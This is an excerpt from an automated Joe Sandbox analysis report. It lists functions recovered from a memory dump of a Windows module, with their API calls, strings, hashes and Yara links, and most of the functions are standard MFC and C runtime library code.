Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 624941980-0
Opcode ID: 91183b6fbb89391b3dcccd9daf03071e0aaac50daf3e0babf3584547c140b14d
Instruction ID: e7b2fc7d504943a8eae33fd711a8bd0228a1f23c6f2a1bc07172f1fb58288e16
Opcode Fuzzy Hash: 91183b6fbb89391b3dcccd9daf03071e0aaac50daf3e0babf3584547c140b14d
Instruction Fuzzy Hash: 2E41BE70E04635DBDF149F60CD98BAE7B78AF01358F101699E81DA2991EB319E88CF20

Function 6C543F34 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C547C6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C547C81
UnhandledExceptionFilter.KERNEL32(6C55A4B8), ref: 6C547C8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6C547CA8
TerminateProcess.KERNEL32(00000000), ref: 6C547CAF

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 2cf772bcaabc571770560b4b04e43604d53d5a72295cf1651bcd726206ee7f1d
Instruction ID: c399813eb67e3eab326e54807fde7fcd57f95fc43f9c9b00fbc876de302cbb02
Opcode Fuzzy Hash: 2cf772bcaabc571770560b4b04e43604d53d5a72295cf1651bcd726206ee7f1d
Instruction Fuzzy Hash: 2821DFB4A92205DFDB40CF2FCC456697BB4BB4A309FD2411AE44897372EBB059848F49

Function 6C5389B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6C5389FC
__snwprintf_s.LIBCMT ref: 6C538A2E
LoadLibraryW.KERNEL32(?), ref: 6C538A69

Part of subcall function 6C545348: __getptd_noexit.LIBCMT ref: 6C545348

Strings

LOC, xrefs: 6C5389DC

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
String ID: LOC
API String ID: 3175857669-519433814
Opcode ID: a6701c71937155428ea6e1aa7268d47ac882d64b20a9cdd8f391258fc858fae2
Instruction ID: 113dcd4705afe3c1bc6302cba6830baa411dba5cf656678d373710219e9ce281
Opcode Fuzzy Hash: a6701c71937155428ea6e1aa7268d47ac882d64b20a9cdd8f391258fc858fae2
Instruction Fuzzy Hash: 9C110A71A50318EBDB159BA4CC44BEE77ADEB42328F504467F118E7590EB748E08D762

Function 6C5404EE Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 6C540514
GetKeyState.USER32(00000011), ref: 6C54051D
GetKeyState.USER32(00000012), ref: 6C540526
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6C54053C

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: State$MessageSend
String ID:
API String ID: 1440529007-0
Opcode ID: 4586b18cf9daceb5c45b62b0fbd082351899149d9c51cc80f628712e977fd765
Instruction ID: df23abd5ab10453f230288bdae1e8fd29f1a0c2d6328e171773bd41f1da304fc
Opcode Fuzzy Hash: 4586b18cf9daceb5c45b62b0fbd082351899149d9c51cc80f628712e977fd765
Instruction Fuzzy Hash: C4F0BE367912EEE6EA5422744C01FE90924CFE1B98F614467A649EA9C2CBA0CC466661

Function 6C538BDF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C538BE9
GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C538EB7,?,?), ref: 6C538C19
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C538C2D
ConvertDefaultLocale.KERNEL32(?), ref: 6C538C69
ConvertDefaultLocale.KERNEL32(?), ref: 6C538C77
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C538C94
ConvertDefaultLocale.KERNEL32(?), ref: 6C538CBF
ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C538CC8
GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6C538CE1
EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6C538CFE
ConvertDefaultLocale.KERNEL32(?), ref: 6C538D31
ConvertDefaultLocale.KERNEL32(00000000), ref: 6C538D3A
GetModuleFileNameW.KERNEL32(6C530000,?,00000105), ref: 6C538D7F
_memset.LIBCMT ref: 6C538D9F

Strings

kernel32.dll, xrefs: 6C538C02
ntdll.dll, xrefs: 6C538CDC
GetUserDefaultUILanguage, xrefs: 6C538C21
GetSystemDefaultUILanguage, xrefs: 6C538C79

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 23549ebeab13f287a116174194b60b2f69453d4c8d5aecaeb44fae873506a4bc
Instruction ID: 3b03db9c49a61f86cc2ef1587fd882bad448520d88dca8f50d8ed8a122f4187a
Opcode Fuzzy Hash: 23549ebeab13f287a116174194b60b2f69453d4c8d5aecaeb44fae873506a4bc
Instruction Fuzzy Hash: 01517C71D11238AACB64DFA59C887ADB7B4EF98304F5005DBA44CE7280EB748E80CF55

Function 6C53DCCE Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6C53DE36,?,?,?,?,?,?,?,6C53FCC6,00000000,00000002,00000028), ref: 6C53DCF9
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6C53DD15
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C53DD2A
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6C53DD3B
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6C53DD4C
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6C53DD5D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6C53DD6E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6C53DD8E

Strings

GetMonitorInfoA, xrefs: 6C53DD88
GetMonitorInfoW, xrefs: 6C53DD81
USER32, xrefs: 6C53DCEF
GetSystemMetrics, xrefs: 6C53DD0F
MonitorFromWindow, xrefs: 6C53DD24
EnumDisplayMonitors, xrefs: 6C53DD57
MonitorFromRect, xrefs: 6C53DD35
MonitorFromPoint, xrefs: 6C53DD46
EnumDisplayDevicesW, xrefs: 6C53DD68

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2451437823
Opcode ID: b2ade9c3c2734b315d6de0592da3ca819df0cb3234c72b34fa8c6799fe2cc5c4
Instruction ID: 844551fd2398c3ff965af531ca6a0fcc9b5ccdf2ef7bd8296cba436b9087b543
Opcode Fuzzy Hash: b2ade9c3c2734b315d6de0592da3ca819df0cb3234c72b34fa8c6799fe2cc5c4
Instruction Fuzzy Hash: 5E210CB1A251B1DF8B43EF6A8CD443ABBF4B68B2153666D3FD109D2B14EB7840818A15

Function 6C53FBD6 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6C53FC05
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C53FC28
GetWindowRect.USER32(?,?), ref: 6C53FC42
CopyRect.USER32(?,?), ref: 6C53FCA5
CopyRect.USER32(?,?), ref: 6C53FCAF
GetWindowRect.USER32(00000000,?), ref: 6C53FCB8

Part of subcall function 6C53DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C53DED6

CopyRect.USER32(?,?), ref: 6C53FCD4

Strings

(, xrefs: 6C53FC6E

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Rect$Copy$Window$ByteCharMessageMultiParentSendWide
String ID: (
API String ID: 2332539329-3887548279
Opcode ID: ea56d98c0c6bf2283c25461a9adc2088dd23754b909b189a206f586280496cea
Instruction ID: 8539736ac5e2a941cebf6d522734967d35d3cf098c19ea09bce65a94e721550f
Opcode Fuzzy Hash: ea56d98c0c6bf2283c25461a9adc2088dd23754b909b189a206f586280496cea
Instruction Fuzzy Hash: F3518372A44129ABDF01CBA8CD84EEEBBB9AF88314F155255F919F3680E730E905CB54

Function 6C5419AE Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C5419B8

Part of subcall function 6C53C050: __EH_prolog3.LIBCMT ref: 6C53C057

CallNextHookEx.USER32(?,?,?,?), ref: 6C5419F8

Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4

_memset.LIBCMT ref: 6C541A51
GetClassLongW.USER32(?,000000E0), ref: 6C541A85
GetClassNameW.USER32(?,?,00000100), ref: 6C541B20
GetPropW.USER32(?,AfxOldWndProc423), ref: 6C541B5D
SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6C541B6F
GetPropW.USER32(?,AfxOldWndProc423), ref: 6C541B77
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6C541B86
CallNextHookEx.USER32(?,00000003,?,?), ref: 6C541BA6
UnhookWindowsHookEx.USER32(?), ref: 6C541BBA

Strings

#32768, xrefs: 6C541A63, 6C541A68, 6C541B36
AfxOldWndProc423, xrefs: 6C541B56, 6C541B5B, 6C541B6D, 6C541B75, 6C541B85

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: HookProp$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_LongNameThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423
API String ID: 3902210324-2141921550
Opcode ID: 95c4b682cab0c836eaa9aa9b9aed8cce83d4df4d938f3456bba50bc09e4db23a
Instruction ID: 4360e1bd1f79a3be6f54c14eac8d887c4bf5a8d72355985dfb8641170f2d853d
Opcode Fuzzy Hash: 95c4b682cab0c836eaa9aa9b9aed8cce83d4df4d938f3456bba50bc09e4db23a
Instruction Fuzzy Hash: 0B51C371541225EBCF119B61CC48BDF7BB8BF05365F514185F40E96AA0EB30CE91CBA5

Function 6C54A11F Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C55E928,0000000C,6C54A25A,00000000,00000000,?,6C54A5D4,00000000,00000001,00000000,?,6C54A89E,00000018,6C55E978,0000000C), ref: 6C54A131
__crt_waiting_on_module_handle.LIBCMT ref: 6C54A13C

Part of subcall function 6C545BCF: Sleep.KERNEL32(000003E8,00000000,?,6C54A082,KERNEL32.DLL,?,?,6C54A416,00000000,?,6C54488C,00000000,?,?,?,6C5448EF), ref: 6C545BDB
Part of subcall function 6C545BCF: GetModuleHandleW.KERNEL32(00000000,?,6C54A082,KERNEL32.DLL,?,?,6C54A416,00000000,?,6C54488C,00000000,?,?,?,6C5448EF,?), ref: 6C545BE4

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6C54A165
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6C54A175
__lock.LIBCMT ref: 6C54A197
InterlockedIncrement.KERNEL32(?), ref: 6C54A1A4
__lock.LIBCMT ref: 6C54A1B8
___addlocaleref.LIBCMT ref: 6C54A1D6

Strings

KERNEL32.DLL, xrefs: 6C54A12B, 6C54A130, 6C54A13B
DecodePointer, xrefs: 6C54A16D
EncodePointer, xrefs: 6C54A159
$Vl, xrefs: 6C54A18E

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: $Vl$DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-393673013
Opcode ID: 9bf86a3d511fc3f5894aad51c6eda53c7bc607ac75242a0f227362c511e16eaa
Instruction ID: e7ea27a2b22943c43c5f2659918bba728074be858db68b40833ca9a74a1c667f
Opcode Fuzzy Hash: 9bf86a3d511fc3f5894aad51c6eda53c7bc607ac75242a0f227362c511e16eaa
Instruction Fuzzy Hash: 6D11B471801701DFD7608F79CC05B9ABBF0AF84318F50851EE49A97B90CB74A940CF65

Function 6C5384DA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32), ref: 6C538503
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C538520
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6C53852D
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6C53853A
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6C538547

Strings

ReleaseActCtx, xrefs: 6C538522
ActivateActCtx, xrefs: 6C53852F
CreateActCtxW, xrefs: 6C53851A
DeactivateActCtx, xrefs: 6C53853C
KERNEL32, xrefs: 6C5384FE

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-2424895508
Opcode ID: f3cc02fff111723098398127c0212525d9d5e58ed411f7fc07d7cf0cb74effa3
Instruction ID: f7b7cd0888daa718507c0da680b0971e068efeb41b755cf56bd5248b8c1d2387
Opcode Fuzzy Hash: f3cc02fff111723098398127c0212525d9d5e58ed411f7fc07d7cf0cb74effa3
Instruction Fuzzy Hash: B71154F1A15262BFCF149F6B8C89426BFB4A64631C355153FE10DC3661FA308440CB27

Function 6C53A59C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32,6C53A6B6), ref: 6C53A5AA
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C53A5CB
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C53A5DD
GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C53A5EF
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C53A601

Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4

Strings

ReleaseActCtx, xrefs: 6C53A5CD
ActivateActCtx, xrefs: 6C53A5DF
CreateActCtxW, xrefs: 6C53A5C5
DeactivateActCtx, xrefs: 6C53A5F1
KERNEL32, xrefs: 6C53A5A5

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 417325364-2424895508
Opcode ID: cd043e7d96c326ecf6cb1547f1464dd23247df280506232f931d4bffe801fb02
Instruction ID: 91dfaa8955da8a21dd98aff6ad3a3bfe3d2b83d0fbf99938591490e198562527
Opcode Fuzzy Hash: cd043e7d96c326ecf6cb1547f1464dd23247df280506232f931d4bffe801fb02
Instruction Fuzzy Hash: 93F0C7F4E55235AFCF415FBB9C045257F78E70675C742491BE80593620EB748058CF5A

Function 6C531C00 Relevance: 13.7, APIs: 9, Instructions: 159fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6C531BE9,?,?,?,?), ref: 6C531C39
GetLastError.KERNEL32(?,?,?,?,?,6C531BE9,?,?,?,?), ref: 6C531C48
__aullrem.LIBCMT ref: 6C531C60
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6C531CE8
_memset.LIBCMT ref: 6C531CF5
SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6C531BE9,?,?,?,?), ref: 6C531D07

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: File$Pointer$ErrorLastRead__aullrem_memset
String ID:
API String ID: 123228641-0
Opcode ID: 6fe4a7196ff8b040cb05244e9987387a9350bdae7362a35242ff88e46be86bbc
Instruction ID: 7cf3a9d490ddb972b91c3335666d01f70b2eeeb3747d2640ede3524e02da9c04
Opcode Fuzzy Hash: 6fe4a7196ff8b040cb05244e9987387a9350bdae7362a35242ff88e46be86bbc
Instruction Fuzzy Hash: 10518C71604315AFD740CF39CC40B9BB7E8EBC9758F405A2AF958E3240E770E9048BA2

Function 6C53BE0D Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C53BE14
RtlEnterCriticalSection.NTDLL(00000000), ref: 6C53BE25
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?,?,?,?), ref: 6C53BE43
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?), ref: 6C53BE77
RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BEE3
_memset.LIBCMT ref: 6C53BF02
TlsSetValue.KERNEL32(?,00000000), ref: 6C53BF13
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C53BF34

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 228f014fddbfbc3edb6109c4a814061843b0079a2c6325c023a57d9ae95afe9d
Instruction ID: 60b2504a7fe23d3866d86e15c3f414249e2f34b3ac80838d10c54d9f51c0efb4
Opcode Fuzzy Hash: 228f014fddbfbc3edb6109c4a814061843b0079a2c6325c023a57d9ae95afe9d
Instruction Fuzzy Hash: C7318D71500A25EFDB10EF54CC8589AB7B1FF45314B60D62AE66A9BE90DB30AD54CF80

Function 6C5381FA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C53815A: GetParent.USER32(?), ref: 6C5381AE
Part of subcall function 6C53815A: GetLastActivePopup.USER32(?), ref: 6C5381BF
Part of subcall function 6C53815A: IsWindowEnabled.USER32(?), ref: 6C5381D3
Part of subcall function 6C53815A: EnableWindow.USER32(?,00000000), ref: 6C5381E6

EnableWindow.USER32(?,00000001), ref: 6C538247
GetWindowThreadProcessId.USER32(?,?), ref: 6C53825B
GetCurrentProcessId.KERNEL32(?,?), ref: 6C538265
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6C53827D
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6C5382F9
EnableWindow.USER32(00000000,00000001), ref: 6C538340

Strings

8mSl, xrefs: 6C5381FC

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 8mSl
API String ID: 1877664794-2168878277
Opcode ID: 723c796d7131f0a216e73190a5c11092471a10921fbd2e6ccc13168e6db81c4e
Instruction ID: dcbfc914347aba37dcbb36f6a19b7d61a4832bf32c22b0ad69b42a7ca72b06f9
Opcode Fuzzy Hash: 723c796d7131f0a216e73190a5c11092471a10921fbd2e6ccc13168e6db81c4e
Instruction Fuzzy Hash: 6C41E171A416289BDB25CF64CC88BDA77B4FF44304F20159BF92CE6281E770DE808B96

Function 6C53DE96 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C53DED6
SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6C53DF00
GetSystemMetrics.USER32(00000000), ref: 6C53DF17
GetSystemMetrics.USER32(00000001), ref: 6C53DF1E
MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6C53DF49

Strings

DISPLAY, xrefs: 6C53DF40
B, xrefs: 6C53DEE0

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: System$ByteCharMetricsMultiWide$InfoParameters
String ID: B$DISPLAY
API String ID: 381819527-3316187204
